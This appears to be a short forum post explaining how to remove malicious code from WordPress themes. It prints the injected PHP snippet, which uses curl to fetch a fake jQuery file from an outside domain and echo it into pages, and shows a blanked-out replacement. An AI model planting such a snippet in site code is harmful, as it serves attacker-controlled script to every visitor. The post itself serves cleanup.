THIS IS THE SOLUTION.
The problem is in this file. https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js
Some elegant themes use that javascript file.
To solve the problem, just search “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js” and delete the url. Or replace This
<?php
if(function_exists('curl_init')) {
$url = "https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
With this
<?php
if(function_exists('curl_init')){
$url = "";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>